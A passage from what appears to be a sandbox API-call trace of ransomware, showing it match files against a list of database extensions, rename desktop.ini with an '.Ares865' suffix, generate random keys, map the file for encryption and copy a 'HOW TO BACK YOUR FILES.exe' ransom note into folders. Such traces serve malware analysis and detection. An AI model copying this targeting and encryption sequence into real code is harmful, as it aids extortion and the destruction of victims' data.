returned 4 [0059.876] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0059.876] lstrlenW (lpString="avhd") returned 4 [0059.876] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0059.876] lstrlenW (lpString="db") returned 2 [0059.876] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0059.876] lstrlenW (lpString="db2") returned 3 [0059.876] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0059.876] lstrlenW (lpString="db3") returned 3 [0059.876] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0059.876] lstrlenW (lpString="dbf") returned 3 [0059.876] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0059.876] lstrlenW (lpString="mdf") returned 3 [0059.876] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0059.876] lstrlenW (lpString="mdb") returned 3 [0059.876] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0059.876] lstrlenW (lpString="sql") returned 3 [0059.876] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0059.876] lstrlenW (lpString="sqlite") returned 6 [0059.876] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0059.876] lstrlenW (lpString="sqlite3") returned 7 [0059.876] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0059.876] lstrlenW (lpString="sqlitedb") returned 8 [0059.876] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0059.876] lstrlenW (lpString="xml") returned 3 [0059.876] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0059.877] lstrlenW (lpString="$er") returned 3 [0059.877] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0059.877] lstrlenW (lpString="4dd") returned 3 [0059.877] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0059.877] lstrlenW (lpString="4dl") returned 3 [0059.877] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0059.877] lstrlenW (lpString="^^^") returned 3 [0059.877] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0059.877] lstrlenW (lpString="abs") returned 3 [0059.877] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0059.877] lstrlenW (lpString="abx") returned 3 [0059.877] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0059.877] lstrlenW (lpString="accdb") returned 5 [0059.877] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0059.877] lstrlenW (lpString="accdc") returned 5 [0059.877] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0059.877] lstrlenW (lpString="accde") returned 5 [0059.877] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0059.877] lstrlenW (lpString="accdr") returned 5 [0059.877] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0059.877] lstrlenW (lpString="accdt") returned 5 [0059.877] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0059.877] lstrlenW (lpString="accdw") returned 5 [0059.877] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0059.877] lstrlenW (lpString="accft") returned 5 [0059.877] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0059.877] lstrlenW (lpString="adb") returned 3 [0059.877] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0059.877] lstrlenW (lpString="adb") returned 3 [0059.877] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0059.877] lstrlenW (lpString="ade") returned 3 [0059.877] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0059.877] lstrlenW (lpString="adf") returned 3 [0059.877] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0059.877] lstrlenW (lpString="adn") returned 3 [0059.877] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0059.877] lstrlenW (lpString="adp") returned 3 [0059.877] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0059.878] lstrlenW (lpString="alf") returned 3 [0059.878] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0059.878] lstrlenW (lpString="ask") returned 3 [0059.878] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0059.879] lstrlenW (lpString="btr") returned 3 [0059.879] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0059.880] lstrlenW (lpString="cat") returned 3 [0059.880] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0059.880] lstrlenW (lpString="cdb") returned 3 [0059.880] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0059.880] lstrlenW (lpString="ckp") returned 3 [0059.880] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0059.880] lstrlenW (lpString="cma") returned 3 [0059.880] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0059.880] lstrlenW (lpString="cpd") returned 3 [0059.880] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0059.880] lstrlenW (lpString="dacpac") returned 6 [0059.880] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0059.880] lstrlenW (lpString="dad") returned 3 [0059.880] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0059.880] lstrlenW (lpString="dadiagrams") returned 10 [0059.880] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0059.880] lstrlenW (lpString="daschema") returned 8 [0059.880] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0059.880] lstrlenW (lpString="db-journal") returned 10 [0059.880] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0059.880] lstrlenW (lpString="db-shm") returned 6 [0059.880] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0059.880] lstrlenW (lpString="db-wal") returned 6 [0059.880] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0059.880] lstrlenW (lpString="dbc") returned 3 [0059.880] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0059.880] lstrlenW (lpString="dbs") returned 3 [0059.880] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0059.880] lstrlenW (lpString="dbt") returned 3 [0059.880] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0059.880] lstrlenW (lpString="dbv") returned 3 [0059.880] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0059.880] lstrlenW (lpString="dbx") returned 3 [0059.880] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0059.880] lstrlenW (lpString="dcb") returned 3 [0059.880] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0059.880] lstrlenW (lpString="dct") returned 3 [0059.880] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0059.881] lstrlenW (lpString="dcx") returned 3 [0059.881] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0059.881] lstrlenW (lpString="ddl") returned 3 [0059.881] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0059.881] lstrlenW (lpString="dlis") returned 4 [0059.881] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0059.881] lstrlenW (lpString="dp1") returned 3 [0059.881] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0059.881] lstrlenW (lpString="dqy") returned 3 [0059.881] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0059.881] lstrlenW (lpString="dsk") returned 3 [0059.881] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0059.881] lstrlenW (lpString="dsn") returned 3 [0059.881] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0059.881] lstrlenW (lpString="dtsx") returned 4 [0059.881] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0059.881] lstrlenW (lpString="dxl") returned 3 [0059.881] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0059.881] lstrlenW (lpString="eco") returned 3 [0059.881] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0059.881] lstrlenW (lpString="ecx") returned 3 [0059.881] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0059.881] lstrlenW (lpString="edb") returned 3 [0059.881] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0059.881] lstrlenW (lpString="epim") returned 4 [0059.881] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0059.881] lstrlenW (lpString="fcd") returned 3 [0059.881] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0059.881] lstrlenW (lpString="fdb") returned 3 [0059.881] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0059.881] lstrlenW (lpString="fic") returned 3 [0059.881] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0059.881] lstrlenW (lpString="flexolibrary") returned 12 [0059.881] lstrlenW (lpString="fm5") returned 3 [0059.881] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0059.881] lstrlenW (lpString="fmp") returned 3 [0059.881] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0059.881] lstrlenW (lpString="fmp12") returned 5 [0059.882] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0059.882] lstrlenW (lpString="fmpsl") returned 5 [0059.882] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0059.882] lstrlenW (lpString="fol") returned 3 [0059.882] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0059.882] lstrlenW (lpString="fp3") returned 3 [0059.882] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0059.882] lstrlenW (lpString="fp4") returned 3 [0059.882] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0059.882] lstrlenW (lpString="fp5") returned 3 [0059.882] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0059.882] lstrlenW (lpString="fp7") returned 3 [0059.882] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0059.882] lstrlenW (lpString="fpt") returned 3 [0059.882] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0059.882] lstrlenW (lpString="frm") returned 3 [0059.882] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0059.882] lstrlenW (lpString="gdb") returned 3 [0059.882] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0059.882] lstrlenW (lpString="gdb") returned 3 [0059.882] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0059.882] lstrlenW (lpString="grdb") returned 4 [0059.882] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0059.882] lstrlenW (lpString="gwi") returned 3 [0059.882] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0059.882] lstrlenW (lpString="hdb") returned 3 [0059.882] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0059.882] lstrlenW (lpString="his") returned 3 [0059.882] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0059.883] lstrlenW (lpString="ib") returned 2 [0059.883] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0059.883] lstrlenW (lpString="idb") returned 3 [0059.883] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0059.883] lstrlenW (lpString="ihx") returned 3 [0059.883] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0059.883] lstrlenW (lpString="itdb") returned 4 [0059.883] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0059.883] lstrlenW (lpString="itw") returned 3 [0059.883] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0059.883] lstrlenW (lpString="jet") returned 3 [0059.883] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0059.883] lstrlenW (lpString="jtx") returned 3 [0059.883] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0059.883] lstrlenW (lpString="kdb") returned 3 [0059.883] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0059.883] lstrlenW (lpString="kexi") returned 4 [0059.883] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0059.883] lstrlenW (lpString="kexic") returned 5 [0059.883] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0059.883] lstrlenW (lpString="kexis") returned 5 [0059.883] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0059.883] lstrlenW (lpString="lgc") returned 3 [0059.883] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0059.883] lstrlenW (lpString="lwx") returned 3 [0059.883] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0059.883] lstrlenW (lpString="maf") returned 3 [0059.883] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0059.883] lstrlenW (lpString="maq") returned 3 [0059.883] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0059.883] lstrlenW (lpString="mar") returned 3 [0059.883] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0059.883] lstrlenW (lpString="marshal") returned 7 [0059.883] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0059.883] lstrlenW (lpString="mas") returned 3 [0059.883] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0059.883] lstrlenW (lpString="mav") returned 3 [0059.883] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0059.883] lstrlenW (lpString="maw") returned 3 [0059.884] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0059.884] lstrlenW (lpString="mdbhtml") returned 7 [0059.884] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0059.884] lstrlenW (lpString="mdn") returned 3 [0059.884] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0059.884] lstrlenW (lpString="mdt") returned 3 [0059.884] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0059.884] lstrlenW (lpString="mfd") returned 3 [0059.884] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0059.884] lstrlenW (lpString="mpd") returned 3 [0059.884] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0059.884] lstrlenW (lpString="mrg") returned 3 [0059.884] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0059.884] lstrlenW (lpString="mud") returned 3 [0059.884] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0059.884] lstrlenW (lpString="mwb") returned 3 [0059.884] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0059.884] lstrlenW (lpString="myd") returned 3 [0059.884] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0059.884] lstrlenW (lpString="ndf") returned 3 [0059.884] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0059.884] lstrlenW (lpString="nnt") returned 3 [0059.884] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0059.884] lstrlenW (lpString="nrmlib") returned 6 [0059.884] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0059.884] lstrlenW (lpString="ns2") returned 3 [0059.884] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0059.884] lstrlenW (lpString="ns3") returned 3 [0059.884] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0059.884] lstrlenW (lpString="ns4") returned 3 [0059.884] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0059.884] lstrlenW (lpString="nsf") returned 3 [0059.884] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0059.884] lstrlenW (lpString="nv") returned 2 [0059.884] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0059.884] lstrlenW (lpString="nv2") returned 3 [0059.884] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0059.884] lstrlenW (lpString="nwdb") returned 4 [0059.885] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0059.885] lstrlenW (lpString="nyf") returned 3 [0059.885] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0059.885] lstrlenW (lpString="odb") returned 3 [0059.885] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0059.885] lstrlenW (lpString="odb") returned 3 [0059.885] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0059.885] lstrlenW (lpString="oqy") returned 3 [0059.885] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0059.885] lstrlenW (lpString="ora") returned 3 [0059.885] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0059.885] lstrlenW (lpString="orx") returned 3 [0059.885] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0059.885] lstrlenW (lpString="owc") returned 3 [0059.885] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0059.885] lstrlenW (lpString="p96") returned 3 [0059.885] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0059.885] lstrlenW (lpString="p97") returned 3 [0059.885] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0059.885] lstrlenW (lpString="pan") returned 3 [0059.885] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0059.885] lstrlenW (lpString="pdb") returned 3 [0059.885] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0059.885] lstrlenW (lpString="pdm") returned 3 [0059.885] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0059.885] lstrlenW (lpString="pnz") returned 3 [0059.885] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0059.885] lstrlenW (lpString="qry") returned 3 [0059.885] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0059.885] lstrlenW (lpString="qvd") returned 3 [0059.885] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0059.885] lstrlenW (lpString="rbf") returned 3 [0059.885] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0059.885] lstrlenW (lpString="rctd") returned 4 [0059.885] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0059.885] lstrlenW (lpString="rod") returned 3 [0059.885] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0059.885] lstrlenW (lpString="rodx") returned 4 [0059.886] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0059.886] lstrlenW (lpString="rpd") returned 3 [0059.886] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0059.886] lstrlenW (lpString="rsd") returned 3 [0059.886] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0059.886] lstrlenW (lpString="sas7bdat") returned 8 [0059.886] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0059.886] lstrlenW (lpString="sbf") returned 3 [0059.886] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0059.886] lstrlenW (lpString="scx") returned 3 [0059.886] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0059.886] lstrlenW (lpString="sdb") returned 3 [0059.886] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0059.886] lstrlenW (lpString="sdc") returned 3 [0059.886] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0059.886] lstrlenW (lpString="sdf") returned 3 [0059.886] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0059.886] lstrlenW (lpString="sis") returned 3 [0059.886] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0059.886] lstrlenW (lpString="spq") returned 3 [0059.886] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0059.886] lstrlenW (lpString="te") returned 2 [0059.886] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0059.886] lstrlenW (lpString="teacher") returned 7 [0059.886] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0059.886] lstrlenW (lpString="tmd") returned 3 [0059.886] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0059.886] lstrlenW (lpString="tps") returned 3 [0059.886] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0059.886] lstrlenW (lpString="trc") returned 3 [0059.886] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0059.886] lstrlenW (lpString="trc") returned 3 [0059.886] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0059.886] lstrlenW (lpString="trm") returned 3 [0059.886] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0059.886] lstrlenW (lpString="udb") returned 3 [0059.887] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0059.887] lstrlenW (lpString="udl") returned 3 [0059.887] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0059.887] lstrlenW (lpString="usr") returned 3 [0059.887] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0059.887] lstrlenW (lpString="v12") returned 3 [0059.887] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0059.887] lstrlenW (lpString="vis") returned 3 [0059.887] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0059.887] lstrlenW (lpString="vpd") returned 3 [0059.887] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0059.887] lstrlenW (lpString="vvv") returned 3 [0059.887] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0059.887] lstrlenW (lpString="wdb") returned 3 [0059.887] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0059.887] lstrlenW (lpString="wmdb") returned 4 [0059.887] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0059.887] lstrlenW (lpString="wrk") returned 3 [0059.887] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0059.887] lstrlenW (lpString="xdb") returned 3 [0059.887] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0059.887] lstrlenW (lpString="xld") returned 3 [0059.887] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0059.887] lstrlenW (lpString="xmlff") returned 5 [0059.887] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0059.887] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Recent\\desktop.ini.Ares865") returned 48 [0059.887] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Recent\\desktop.ini" (normalized: "c:\\users\\default user\\recent\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Recent\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\recent\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0059.888] CreateFileW (lpFileName="C:\\Users\\Default User\\Recent\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\recent\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0059.888] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=432) returned 1 [0059.888] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0059.889] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0059.889] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0059.889] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0059.889] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0059.889] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0059.890] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b0, lpName=0x0) returned 0x164 [0059.893] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4b0) returned 0x190000 [0059.894] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0059.894] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0059.894] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0059.894] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0059.895] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0059.895] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0059.895] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0059.895] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0059.895] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0059.895] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0059.895] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0059.895] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0059.895] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0059.895] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0059.895] CloseHandle (hObject=0x164) returned 1 [0059.895] CloseHandle (hObject=0x15c) returned 1 [0059.896] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0059.896] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0059.896] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0059.897] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e7cb40, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49e7cb40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0059.897] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0059.897] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e7cb40, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49e7cb40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0059.897] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0059.897] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2368 [0059.897] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Recent\\CustomDestinations", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Recent\\CustomDestinations") returned="C:\\Users\\Default User\\Recent\\CustomDestinations" [0059.897] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2098 | out: hHeap=0x2b0000) returned 1 [0059.897] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0059.897] lstrlenW (lpString="C:\\Users\\Default User\\Recent\\CustomDestinations") returned 47 [0059.897] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Recent\\CustomDestinations" | out: lpString1="C:\\Users\\Default User\\Recent\\CustomDestinations") returned="C:\\Users\\Default User\\Recent\\CustomDestinations" [0059.897] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.897] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Recent\\CustomDestinations\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\recent\\customdestinations\\how to back your files.exe"), bFailIfExists=1) returned 0 [0059.898] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0059.898] 